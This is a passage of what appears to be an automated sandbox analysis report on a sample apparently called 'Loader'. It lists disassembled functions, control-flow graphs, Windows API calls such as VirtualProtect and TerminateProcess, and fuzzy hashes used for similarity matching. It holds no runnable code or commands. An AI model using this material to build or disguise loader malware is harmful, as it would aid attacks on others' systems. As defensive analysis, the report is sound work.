                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProcProtectVirtual
                                                                                                                • String ID: @$VirtualProtect
                                                                                                                • API String ID: 3759838892-29487290
                                                                                                                • Opcode ID: b92ad4e47759c0578fb79c96feb478984cea38a99527a57465ff8cd30855b795
                                                                                                                • Instruction ID: ac1913e113e58ebd1cd30228865e810d141904fd9748f2118573445a7401eebe
                                                                                                                • Opcode Fuzzy Hash: b92ad4e47759c0578fb79c96feb478984cea38a99527a57465ff8cd30855b795
                                                                                                                • Instruction Fuzzy Hash: 7341D0B0900208DFCB04DFA9D998B9EBBF0FF08344F118459E858AB341D775A944CF82

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00CCF1A0,?,00CCF355,00000000,?,?,00CCF1A0,F876D5F9,?,00CCF1A0), ref: 00CCF2A4
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,00CCF355,00000000,?,?,00CCF1A0,F876D5F9,?,00CCF1A0), ref: 00CCF2AB
                                                                                                                • ExitProcess.KERNEL32 ref: 00CCF2BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1703294689-0
                                                                                                                • Opcode ID: fba4a784ae1d16194e1a5d6cf027f92175b3f48819d70f6e1a1fcd1d7a8658dd
                                                                                                                • Instruction ID: 85838204c3139ad87c97597d80d8380cf211a6d7641b504596429e5895dfcd1b
                                                                                                                • Opcode Fuzzy Hash: fba4a784ae1d16194e1a5d6cf027f92175b3f48819d70f6e1a1fcd1d7a8658dd
                                                                                                                • Instruction Fuzzy Hash: 06D06C32000188ABDF152FA4EC49B9D3F6AAB44391B944029F9199A072CF359996EA90

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 88 cdd3a4-cdd3c6 89 cdd3cc-cdd3ce 88->89 90 cdd5b9 88->90 92 cdd3fa-cdd41d 89->92 93 cdd3d0-cdd3ef call cd1ba8 89->93 91 cdd5bb-cdd5bf 90->91 94 cdd41f-cdd421 92->94 95 cdd423-cdd429 92->95 99 cdd3f2-cdd3f5 93->99 94->95 98 cdd42b-cdd43c 94->98 95->93 95->98 100 cdd44f-cdd45f call cdd6d1 98->100 101 cdd43e-cdd44c call cdc152 98->101 99->91 106 cdd4a8-cdd4ba 100->106 107 cdd461-cdd467 100->107 101->100 108 cdd4bc-cdd4c2 106->108 109 cdd511-cdd531 WriteFile 106->109 110 cdd469-cdd46c 107->110 111 cdd490-cdd4a6 call cdd74e 107->111 115 cdd4fd-cdd50a call cddb7d 108->115 116 cdd4c4-cdd4c7 108->116 112 cdd53c 109->112 113 cdd533-cdd539 GetLastError 109->113 117 cdd46e-cdd471 110->117 118 cdd477-cdd486 call cddb15 110->118 128 cdd489-cdd48b 111->128 122 cdd53f-cdd54a 112->122 113->112 127 cdd50f 115->127 123 cdd4e9-cdd4fb call cddd41 116->123 124 cdd4c9-cdd4cc 116->124 117->118 125 cdd551-cdd554 117->125 118->128 129 cdd54c-cdd54f 122->129 130 cdd5b4-cdd5b7 122->130 134 cdd4e4-cdd4e7 123->134 131 cdd557-cdd559 124->131 132 cdd4d2-cdd4df call cddc58 124->132 125->131 127->134 128->122 129->125 130->91 135 cdd55b-cdd560 131->135 136 cdd587-cdd593 131->136 132->134 134->128 141 cdd579-cdd582 call cd13a0 135->141 142 cdd562-cdd574 135->142 139 cdd59d-cdd5af 136->139 140 cdd595-cdd59b 136->140 139->99 140->90 140->139 141->99 142->99
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CDD74E: GetConsoleOutputCP.KERNEL32(F876D5F9,00000000,00000000,?), ref: 00CDD7B1
                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00CCD832,?,00CCDA94), ref: 00CDD529
                                                                                                                • GetLastError.KERNEL32(?,00CCD832,?,00CCDA94,?,00CCDA94,?,?,?,?,?,?,?,00000000,?,?), ref: 00CDD533
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 2915228174-0
                                                                                                                • Opcode ID: ecbc99522cd464705de079367e6132e7f4d795ef561eba2ac08887c3907d4f35
                                                                                                                • Instruction ID: c188e66382a534025fb6c7d7da297e90094fbdd030970fc716f583ddbefedba2
                                                                                                                • Opcode Fuzzy Hash: ecbc99522cd464705de079367e6132e7f4d795ef561eba2ac08887c3907d4f35
                                                                                                                • Instruction Fuzzy Hash: B961B4B1D00119AFDF11DFA8D884AFEBFB9AF49308F140146EA16A7356D371DA01DBA1

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 145 cd72a8-cd72d0 call cd74ad 148 cd7495-cd7496 call cd751e 145->148 149 cd72d6-cd72dc 145->149 152 cd749b-cd749d 148->152 151 cd72df-cd72e5 149->151 153 cd72eb-cd72f7 151->153 154 cd73e1-cd7400 call ccc690 151->154 157 cd749e-cd74ac call cc71d1 152->157 153->151 155 cd72f9-cd72ff 153->155 163 cd7403-cd7408 154->163 158 cd73d9-cd73dc 155->158 159 cd7305-cd7311 IsValidCodePage 155->159 158->157 159->158 162 cd7317-cd731e 159->162 165 cd7340-cd734d GetCPInfo 162->165 166 cd7320-cd732c 162->166 167 cd740a-cd740f 163->167 168 cd7445-cd744f 163->168 171 cd73cd-cd73d3 165->171 172 cd734f-cd736e call ccc690 165->172 170 cd7330-cd733b 166->170 173 cd7411-cd7419 167->173 174 cd7442 167->174 168->163 169 cd7451-cd747b call cd77f9 168->169 184 cd747c-cd748b 169->184 176 cd748d-cd748e call cd7837 170->176 171->148 171->158 172->170 186 cd7370-cd7377 172->186 178 cd741b-cd741e 173->178 179 cd743a-cd7440 173->179 174->168 185 cd7493 176->185 183 cd7420-cd7426 178->183 179->167 179->174 183->179 187 cd7428-cd7438 183->187 184->176 184->184 185->152 188 cd7379-cd737e 186->188 189 cd73a3-cd73a6 186->189 187->179 187->183 188->189 191 cd7380-cd7388 188->191 190 cd73ab-cd73b2 189->190 190->190 192 cd73b4-cd73c8 call cd77f9 190->192 193 cd739b-cd73a1 191->193 194 cd738a-cd7391 191->194 192->170 193->188 193->189 196 cd7392-cd7399 194->196 196->193 196->196
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00CD74AD: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00CD74D8
                                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00CD76B8,?,00000000,?,?,?), ref: 00CD7309
                                                                                                                • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00CD76B8,?,00000000,?,?,?), ref: 00CD7345
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                • String ID:
                                                                                                                • API String ID: 546120528-0
                                                                                                                • Opcode ID: 6041a77f1d2ae73757b799583911339cfcb6d809f336c70796cf7c2c53d1021d
                                                                                                                • Instruction ID: 91544028a971bcab673e3f1e63b3f2cef4a0e99bf80cb9fbf0919626cbdf7492
                                                                                                                • Opcode Fuzzy Hash: 6041a77f1d2ae73757b799583911339cfcb6d809f336c70796cf7c2c53d1021d
                                                                                                                • Instruction Fuzzy Hash: 04512470A082459EDB21CF35C8856AAFBF5EF44300F18466FD6A68B361F7749A46DF80

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 198 cddb7d-cddbd2 call cca050 201 cddbd4 198->201 202 cddc47-cddc57 call cc71d1 198->202 203 cddbda 201->203 205 cddbe0-cddbe2 203->205 207 cddbfc-cddc21 WriteFile 205->207 208 cddbe4-cddbe9 205->208 211 cddc3f-cddc45 GetLastError 207->211 212 cddc23-cddc2e 207->212 209 cddbeb-cddbf1 208->209 210 cddbf2-cddbfa 208->210 209->210 210->205 210->207 211->202 212->202 213 cddc30-cddc3b 212->213 213->203 214 cddc3d 213->214 214->202
                                                                                                                APIs
                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00CDD50F,?,00CCDA94,?,?,?,00000000), ref: 00CDDC19
                                                                                                                • GetLastError.KERNEL32(?,00CDD50F,?,00CCDA94,?,?,?,00000000,?,?,?,?,?,00CCD832,?,00CCDA94), ref: 00CDDC3F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 442123175-0
                                                                                                                • Opcode ID: 7048dcaabd859191b0dbcc429820b3cbfa300d70d48d05eba659ec64f4544220
                                                                                                                • Instruction ID: 46544e3d85929fd388dca613b49dab580c555270846b578e01178165548fb128
                                                                                                                • Opcode Fuzzy Hash: 7048dcaabd859191b0dbcc429820b3cbfa300d70d48d05eba659ec64f4544220
                                                                                                                • Instruction Fuzzy Hash: 17216031A002199FCB19CF29DC90AEDB7B9EB98305F1441AAEA06D7351D730EE46CF65

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 215 cd7192-cd7197 216 cd7199-cd71b1 215->216 217 cd71bf-cd71c8 216->217 218 cd71b3-cd71b7 216->218 220 cd71da 217->220 221 cd71ca-cd71cd 217->221 218->217 219 cd71b9-cd71bd 218->219 223 cd7234-cd7238 219->223 222 cd71dc-cd71e9 GetStdHandle 220->222 224 cd71cf-cd71d4 221->224 225 cd71d6-cd71d8 221->225 226 cd71eb-cd71ed 222->226 227 cd7216-cd7228 222->227 223->216 228 cd723e-cd7241 223->228 224->222 225->222 226->227 229 cd71ef-cd71f8 GetFileType 226->229 227->223 230 cd722a-cd722d 227->230 229->227 231 cd71fa-cd7203 229->231 230->223 232 cd720b-cd720e 231->232 233 cd7205-cd7209 231->233 232->223 234 cd7210-cd7214 232->234 233->223 234->223
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00CD7081,00CEFCD8,0000000C), ref: 00CD71DE
                                                                                                                • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00CD7081,00CEFCD8,0000000C), ref: 00CD71F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleType
                                                                                                                • String ID:
                                                                                                                • API String ID: 3000768030-0
                                                                                                                • Opcode ID: b2812173536ac2adb018892da5c777136ba60b40e8b4ad5ab80848fe5aa5ecea
                                                                                                                • Instruction ID: 0c8e3be1b6c82313c762e5902a13cf05d578c2d416b3321a86be5316e96a4e24
                                                                                                                • Opcode Fuzzy Hash: b2812173536ac2adb018892da5c777136ba60b40e8b4ad5ab80848fe5aa5ecea
                                                                                                                • Instruction Fuzzy Hash: 8011DA3110C7818ACB348E3E8C8873A7A95A756370B38075FE6BA877F1E730DA46D641

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32 ref: 00CC2038
                                                                                                                • GetModuleFileNameW.KERNEL32 ref: 00CC2058
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Module$FileHandleName
                                                                                                                • String ID:
                                                                                                                • API String ID: 4146042529-0
                                                                                                                • Opcode ID: df661b2f68ccf578d63f565faa9b22fa2e95a3a22138f55475c57c905a81d8e1
                                                                                                                • Instruction ID: 03a94ebb9a9dfb1fc635de11f5407040ef947bed566f100fed9bcc794324bcdf
                                                                                                                • Opcode Fuzzy Hash: df661b2f68ccf578d63f565faa9b22fa2e95a3a22138f55475c57c905a81d8e1
                                                                                                                • Instruction Fuzzy Hash: 4701ECB09042088FDB15EF68D58579DBBF4FB48340F4145ADE889D7381EB749A88DF52

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 242 cd64f3-cd6502 call cd6862 245 cd652b-cd6545 call cd658f LCMapStringW 242->245 246 cd6504-cd6529 LCMapStringEx 242->246 250 cd654b-cd654d 245->250 246->250
                                                                                                                APIs
                                                                                                                • LCMapStringEx.KERNELBASE(?,00CD6F1A,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00CD6527
                                                                                                                • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00CD6F1A,?,?,-00000008,?,00000000), ref: 00CD6545
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String
                                                                                                                • String ID:
                                                                                                                • API String ID: 2568140703-0
                                                                                                                • Opcode ID: 991e8124ab774c7b9bc5743ddee40963353761c348e3264a072bab5ba6ff9404
                                                                                                                • Instruction ID: 868df29e9cd5b52c60f9dd09a85a29f5902441891fdbc4600933a0a3116f9782
                                                                                                                • Opcode Fuzzy Hash: 991e8124ab774c7b9bc5743ddee40963353761c348e3264a072bab5ba6ff9404
                                                                                                                • Instruction Fuzzy Hash: 28F07A3240015ABBCF126F91EC15EDE7F66FF487A0F058511FA1825224C732CA71EB91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 251 cd56b7-cd56c0 252 cd56ef-cd56f0 251->252 253 cd56c2-cd56d5 RtlFreeHeap 251->253 253->252 254 cd56d7-cd56ee GetLastError call cd135d call cd1314 253->254 254->252
                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,00CD9A64,?,00000000,?,?,00CD9704,?,00000007,?,?,00CDA04A,?,?), ref: 00CD56CD
                                                                                                                • GetLastError.KERNEL32(?,?,00CD9A64,?,00000000,?,?,00CD9704,?,00000007,?,?,00CDA04A,?,?), ref: 00CD56D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 485612231-0
                                                                                                                • Opcode ID: 9eb3c190f95d917194db2b3cb48d05d42cf801478e05904f7147920309df0a00
                                                                                                                • Instruction ID: 5f44e523f0033ba4e17593d542670b804d91b61185be0ffbd08ad8523624962e
                                                                                                                • Opcode Fuzzy Hash: 9eb3c190f95d917194db2b3cb48d05d42cf801478e05904f7147920309df0a00
                                                                                                                • Instruction Fuzzy Hash: DEE08C32200654BBDB212FA8EC08B9D7A989B00792F184022FB1C8A2B0CB30C990DB94

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 259 cd7837-cd7859 260 cd785f-cd7871 GetCPInfo 259->260 261 cd796b-cd7991 259->261 260->261 263 cd7877-cd787e 260->263 262 cd7996-cd799b 261->262 264 cd799d-cd79a3 262->264 265 cd79a5-cd79ab 262->265 266 cd7880-cd788a 263->266 268 cd79b3-cd79b5 264->268 269 cd79ad-cd79b0 265->269 270 cd79b7 265->270 266->266 267 cd788c-cd789f 266->267 271 cd78c0-cd78c2 267->271 272 cd79b9-cd79cb 268->272 269->268 270->272 273 cd78c4-cd78fb call cd6ce0 call cd6de1 271->273 274 cd78a1-cd78a8 271->274 272->262 275 cd79cd-cd79db call cc71d1 272->275 285 cd7900-cd792e call cd6de1 273->285 276 cd78b7-cd78b9 274->276 279 cd78bb-cd78be 276->279 280 cd78aa-cd78ac 276->280 279->271 280->279 283 cd78ae-cd78b6 280->283 283->276 288 cd7930-cd793b 285->288 289 cd793d-cd7947 288->289 290 cd7949-cd794c 288->290 291 cd795c-cd7967 289->291 292 cd794e-cd7958 290->292 293 cd795a 290->293 291->288 294 cd7969 291->294 292->291 293->291 294->275
                                                                                                                APIs
                                                                                                                • GetCPInfo.KERNEL32(00000083,?,00000005,00CD76B8,?), ref: 00CD7869
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 1807457897-0
                                                                                                                • Opcode ID: 80723a258b4f0f8a79024c4ccc1f569972284a1eb482d4457549d9b27fac8d4c
                                                                                                                • Instruction ID: aa679ace7cb9d7feecdc9ff6d8a14410c0e6bb63efa0a42d4ed595eb7a0621d0
                                                                                                                • Opcode Fuzzy Hash: 80723a258b4f0f8a79024c4ccc1f569972284a1eb482d4457549d9b27fac8d4c
                                                                                                                • Instruction Fuzzy Hash: C2517DB190C1589EDB118A29CDC4BF97B6DFF15300F1402EAE299D7282E3309E45DFA0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 295 cd670d-cd6737 296 cd673d-cd673f 295->296 297 cd6739-cd673b 295->297 299 cd6745-cd674c call cd6642 296->299 300 cd6741-cd6743 296->300 298 cd678e-cd6791 297->298 302 cd6751-cd6755 299->302 300->298 303 cd6774-cd678b 302->303 304 cd6757-cd6765 GetProcAddress 302->304 306 cd678d 303->306 304->303 305 cd6767-cd6772 call ccd110 304->305 305->306 306->298
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 966c15dfaba98b343a770cdd30e5bf71cb65915b6d039df03c6a185d297628b8
                                                                                                                • Instruction ID: 0ed63f317c1ce5b1d7282242afc7799593bac56f6bc8c6371447ebd20ac60daa
                                                                                                                • Opcode Fuzzy Hash: 966c15dfaba98b343a770cdd30e5bf71cb65915b6d039df03c6a185d297628b8
                                                                                                                • Instruction Fuzzy Hash: 0001DD336001199F9B159F69EC81B2A73A5F7C1B647364126FA10C7295DB31EC10D7D1
                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00CD7675,?,?,00CD7675,00000220,?,?,?), ref: 00CD5723
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
